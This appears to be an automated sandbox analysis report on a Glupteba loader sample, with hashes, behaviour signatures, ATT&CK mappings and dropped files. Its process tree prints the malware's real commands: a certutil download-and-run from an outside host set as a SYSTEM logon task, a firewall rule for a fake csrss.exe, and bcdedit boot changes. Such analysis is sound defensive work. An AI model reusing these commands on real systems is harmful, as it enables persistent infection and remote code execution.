Analysis

  • max time kernel
    200s
  • max time network
    210s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    12-05-2022 11:41

General

  • Target

    e8145c7ef0e67b08204c5c832c116410e47d0cb47c479c27582c10619fcc2b76.exe

  • Size

    3.9MB

  • MD5

    36b916eede950172b262c888b1e82a72

  • SHA1

    7cacba9f2eaff7584cf6c06c8f5b23853e77cc79

  • SHA256

    e8145c7ef0e67b08204c5c832c116410e47d0cb47c479c27582c10619fcc2b76

  • SHA512

    ffddad17c0879e317b09e72482710e10d72d4b6aae948661d43a34488e4f1ef098b84292da6ef8eb62dbdaa4327f53fbde9ed5eb8c2ac9087cb1cf8de5332115

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 5 IoCs
  • Modifies boot configuration data using bcdedit 3 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e8145c7ef0e67b08204c5c832c116410e47d0cb47c479c27582c10619fcc2b76.exe
    "C:\Users\Admin\AppData\Local\Temp\e8145c7ef0e67b08204c5c832c116410e47d0cb47c479c27582c10619fcc2b76.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1968
    • C:\Users\Admin\AppData\Local\Temp\e8145c7ef0e67b08204c5c832c116410e47d0cb47c479c27582c10619fcc2b76.exe
      "C:\Users\Admin\AppData\Local\Temp\e8145c7ef0e67b08204c5c832c116410e47d0cb47c479c27582c10619fcc2b76.exe"
      2⤵
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1308
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1428
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies data under HKEY_USERS
          PID:1856
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
          PID:844
          • C:\Windows\system32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
            4⤵
            • Creates scheduled task(s)
            PID:1700
          • C:\Windows\system32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            4⤵
            • Creates scheduled task(s)
            PID:1544
          • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
            "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
            4⤵
              PID:592
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                5⤵
                • Modifies boot configuration data using bcdedit
                PID:1616
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                5⤵
                • Modifies boot configuration data using bcdedit
                PID:1728
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                5⤵
                • Modifies boot configuration data using bcdedit
                PID:1716
      • C:\Windows\system32\makecab.exe
        "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220512140138.log C:\Windows\Logs\CBS\CbsPersist_20220512140138.cab
        1⤵
          PID:1420

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Scheduled Task

        1
        T1053

        Persistence

        Modify Existing Service

        1
        T1031

        Scheduled Task

        1
        T1053

        Privilege Escalation

        Scheduled Task

        1
        T1053

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          Filesize

          1.7MB

          MD5

          13aaafe14eb60d6a718230e82c671d57

          SHA1

          e039dd924d12f264521b8e689426fb7ca95a0a7b

          SHA256

          f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

          SHA512

          ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

        • C:\Windows\rss\csrss.exe
          Filesize

          3.9MB

          MD5

          36b916eede950172b262c888b1e82a72

          SHA1

          7cacba9f2eaff7584cf6c06c8f5b23853e77cc79

          SHA256

          e8145c7ef0e67b08204c5c832c116410e47d0cb47c479c27582c10619fcc2b76

          SHA512

          ffddad17c0879e317b09e72482710e10d72d4b6aae948661d43a34488e4f1ef098b84292da6ef8eb62dbdaa4327f53fbde9ed5eb8c2ac9087cb1cf8de5332115

        • \Users\Admin\AppData\Local\Temp\csrss\patch.exe
          Filesize

          1.7MB

          MD5

          13aaafe14eb60d6a718230e82c671d57

          SHA1

          e039dd924d12f264521b8e689426fb7ca95a0a7b

          SHA256

          f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

          SHA512

          ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

        • \Users\Admin\AppData\Local\Temp\dbghelp.dll
          Filesize

          1.5MB

          MD5

          f0616fa8bc54ece07e3107057f74e4db

          SHA1

          b33995c4f9a004b7d806c4bb36040ee844781fca

          SHA256

          6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

          SHA512

          15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
          Filesize

          5.3MB

          MD5

          1afff8d5352aecef2ecd47ffa02d7f7d

          SHA1

          8b115b84efdb3a1b87f750d35822b2609e665bef

          SHA256

          c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

          SHA512

          e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
          Filesize

          5.3MB

          MD5

          1afff8d5352aecef2ecd47ffa02d7f7d

          SHA1

          8b115b84efdb3a1b87f750d35822b2609e665bef

          SHA256

          c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

          SHA512

          e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
          Filesize

          5.3MB

          MD5

          1afff8d5352aecef2ecd47ffa02d7f7d

          SHA1

          8b115b84efdb3a1b87f750d35822b2609e665bef

          SHA256

          c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

          SHA512

          e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

        • \Users\Admin\AppData\Local\Temp\osloader.exe
          Filesize

          591KB

          MD5

          e2f68dc7fbd6e0bf031ca3809a739346

          SHA1

          9c35494898e65c8a62887f28e04c0359ab6f63f5

          SHA256

          b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

          SHA512

          26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

        • \Users\Admin\AppData\Local\Temp\osloader.exe
          Filesize

          591KB

          MD5

          e2f68dc7fbd6e0bf031ca3809a739346

          SHA1

          9c35494898e65c8a62887f28e04c0359ab6f63f5

          SHA256

          b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

          SHA512

          26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

        • \Users\Admin\AppData\Local\Temp\osloader.exe
          Filesize

          591KB

          MD5

          e2f68dc7fbd6e0bf031ca3809a739346

          SHA1

          9c35494898e65c8a62887f28e04c0359ab6f63f5

          SHA256

          b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

          SHA512

          26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

        • \Users\Admin\AppData\Local\Temp\symsrv.dll
          Filesize

          163KB

          MD5

          5c399d34d8dc01741269ff1f1aca7554

          SHA1

          e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

          SHA256

          e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

          SHA512

          8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

        • \Windows\rss\csrss.exe
          Filesize

          3.9MB

          MD5

          36b916eede950172b262c888b1e82a72

          SHA1

          7cacba9f2eaff7584cf6c06c8f5b23853e77cc79

          SHA256

          e8145c7ef0e67b08204c5c832c116410e47d0cb47c479c27582c10619fcc2b76

          SHA512

          ffddad17c0879e317b09e72482710e10d72d4b6aae948661d43a34488e4f1ef098b84292da6ef8eb62dbdaa4327f53fbde9ed5eb8c2ac9087cb1cf8de5332115

        • \Windows\rss\csrss.exe
          Filesize

          3.9MB

          MD5

          36b916eede950172b262c888b1e82a72

          SHA1

          7cacba9f2eaff7584cf6c06c8f5b23853e77cc79

          SHA256

          e8145c7ef0e67b08204c5c832c116410e47d0cb47c479c27582c10619fcc2b76

          SHA512

          ffddad17c0879e317b09e72482710e10d72d4b6aae948661d43a34488e4f1ef098b84292da6ef8eb62dbdaa4327f53fbde9ed5eb8c2ac9087cb1cf8de5332115

        • memory/844-70-0x0000000006F10000-0x000000000760C000-memory.dmp
          Filesize

          7.0MB

        • memory/844-69-0x0000000006B60000-0x0000000006F09000-memory.dmp
          Filesize

          3.7MB

        • memory/844-71-0x0000000000400000-0x000000000515F000-memory.dmp
          Filesize

          77.4MB

        • memory/844-66-0x0000000000000000-mapping.dmp
        • memory/844-68-0x0000000006B60000-0x0000000006F09000-memory.dmp
          Filesize

          3.7MB

        • memory/1308-62-0x0000000000400000-0x000000000515F000-memory.dmp
          Filesize

          77.4MB

        • memory/1308-61-0x0000000006C70000-0x0000000007019000-memory.dmp
          Filesize

          3.7MB

        • memory/1308-58-0x0000000006C70000-0x0000000007019000-memory.dmp
          Filesize

          3.7MB

        • memory/1428-59-0x0000000000000000-mapping.dmp
        • memory/1616-83-0x0000000000000000-mapping.dmp
        • memory/1716-84-0x0000000000000000-mapping.dmp
        • memory/1728-85-0x0000000000000000-mapping.dmp
        • memory/1856-60-0x0000000000000000-mapping.dmp
        • memory/1856-63-0x000007FEFBD01000-0x000007FEFBD03000-memory.dmp
          Filesize

          8KB

        • memory/1968-56-0x0000000007020000-0x000000000771C000-memory.dmp
          Filesize

          7.0MB

        • memory/1968-55-0x0000000006C70000-0x0000000007019000-memory.dmp
          Filesize

          3.7MB

        • memory/1968-57-0x0000000000400000-0x000000000515F000-memory.dmp
          Filesize

          77.4MB

        • memory/1968-54-0x0000000006C70000-0x0000000007019000-memory.dmp
          Filesize

          3.7MB

        • memory/1976-87-0x0000000000000000-mapping.dmp